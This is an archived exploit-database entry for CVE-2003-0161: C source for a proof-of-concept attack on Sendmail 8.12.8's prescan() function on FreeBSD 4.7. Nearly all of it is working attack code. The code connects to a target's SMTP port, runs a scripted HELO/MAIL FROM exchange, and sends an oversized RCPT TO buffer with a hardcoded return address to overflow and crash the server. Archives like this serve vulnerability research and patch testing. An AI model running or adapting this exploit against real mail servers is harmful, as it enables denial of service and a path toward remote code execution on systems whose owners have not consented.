Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution - CVE-2003-0161

1. /*
2.  * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
3.  *
4.  * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
5.  * On sucessful POC exploitation the program should crash with the following:
6.  *
7.  * Program received signal SIGSEGV, Segmentation fault.
8.  * 0x5c5c5c5c in ?? ()
9.  *
10.  */
11.  
12. #include <sys/types.h>
13. #include <sys/socket.h>
14. #include <sys/time.h>
15. #include <netinet/in.h>
16. #include <unistd.h>
17. #include <netdb.h>
18. #include <stdio.h>
19. #include <fcntl.h>
20. #include <errno.h>
21.  
22. int maxarch=1;
23. struct arch {
24.     char *os; // The OS
25.     int pos; // The position of ebp in the stack, with the last byte being 0x00
26.     int apos; // The amount of bytes after pvpbuf where ebp is located
27.     unsigned long addr; // The pointer to the addr buffer
28. } archs[] = {
29.     {"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
30. };
31.  
32.  
33. /////////////////////////////////////////////////////////
34.  
35. #define BUFSIZE 50096
36.  
37. void header() {
38.     printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
39. }
40.  
41. void printtargets() {
42.     unsigned long i;
43.     header();
44.     printf("\t  Target\t Addr\t\t OS\n");
45.     printf("\t-------------------------------------------\n");
46.     for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
47.     printf("\n");
48. }
49.  
50. void printresponse(char *a) {
51.     printf("%s\n",a);
52. }
53.  
54. void writesocket(int sock, char *buf) {
55.     if (send(sock,buf,strlen(buf),0) <= 0) {
56.         printf("Error writing to socket\n");
57.         exit(0);
58.     }
59.     printresponse(buf);
60. }
61.  
62. void readsocket(int sock, int response) {
63.     char temp[BUFSIZE];
64.     memset(temp,0,sizeof(temp));
65.     if (recv(sock,temp,sizeof(temp),0) <= 0) {
66.         printf("Error reading from socket\n");
67.         exit(0);
68.     }
69.     if (response != atol(temp)) {
70.         printf("Bad response: %s\n",temp);
71.         exit(0);
72.     }
73.     else printresponse(temp);
74. }
75.  
76. void relay(int sock) {
77.     while(1) {
78.         char temp[BUFSIZE];
79.         memset(temp,0,sizeof(temp));
80.         if (recv(sock,temp,sizeof(temp),0) <= 0) {
81.             printf("Server vulnerable (crashed)\n");
82.             exit(0);
83.         }
84.         printresponse(temp);
85.         if (atol(temp) == 553) {
86.             printf("Not exploitable\n");
87.             exit(0);
88.         }
89.     }
90. }
91.  
92. int main(int argc, char **argv) {
93.     struct sockaddr_in server;
94.     unsigned long ipaddr,i,j,m;
95.     int sock,target;
96.     char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
97.     if (argc <= 2) {
98.         printf("%s <target ip> <target number>\n",argv[0]);
99.         printtargets();
100.         return 0;
101.     }
102.     target=atol(argv[2]);
103.     if (target < 0 || target >= maxarch) {
104.         printtargets();
105.         return 0;
106.     }
107.  
108.     header();
109.  
110.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
111.         printf("Unable to create socket\n");
112.         exit(0);
113.     }
114.     server.sin_family = AF_INET;
115.     server.sin_port = htons(25);
116.     printf("Resolving address... ");
117.     fflush(stdout);
118.     if ((ipaddr = inet_addr(argv[1])) == -1) {
119.         struct hostent *hostm;
120.         if ((hostm=gethostbyname(argv[1])) == NULL) {
121.             printf("Unable to resolve address\n");
122.             exit(0);
123.         }
124.         memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
125.     }
126.     else server.sin_addr.s_addr = ipaddr;
127.     memset(&(server.sin_zero), 0, 8);
128.     printf("Address found\n");
129.     printf("Connecting... ");
130.     fflush(stdout);
131.     if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
132.         printf("Unable to connect\n");
133.         exit(0);
134.     }
135.     printf("Connected\n");
136.     printf("Sending exploit... \n");
137.     fflush(stdout);
138.  
139.     readsocket(sock,220);
140.  
141.     writesocket(sock,"HELO yahoo.com\r\n");
142.     readsocket(sock,250);
143.  
144.     writesocket(sock,"MAIL FROM: <a@yahoo.com>\r\n");
145.     readsocket(sock,250);
146.  
147.     memset(buf,0,sizeof(buf));
148.     strcpy(buf,"RCPT TO: ");
149.     p=buf+strlen(buf);
150.     for (i=1,j=0,m=0;i<1242;i++) {
151.         if (!(i%256)) {
152.             *p++=';';
153.             j++;
154.         }
155.         else {
156.             if (j < 4) *p++='A';
157.             else {
158.                 if (m == archs[target].pos) pos=p;
159.                 //if (m > archs[target].pos) *p++='B'; else
160.                 *p++='A';
161.                 m++;
162.             }
163.         }
164.     }
165.     if (pos) memcpy(pos,(char*)&archs[target].addr,4);
166.     *p++=';';
167.     for (i=0;i<archs[target].apos;i++) {
168.         *p++='\\';
169.         *p++=0xff;
170.     }
171.     strcat(buf,"\r\n");
172.     writesocket(sock,buf);
173.  
174.     relay(sock);
175. }
176.  
177.  
178. // milw0rm.com [2003-04-30]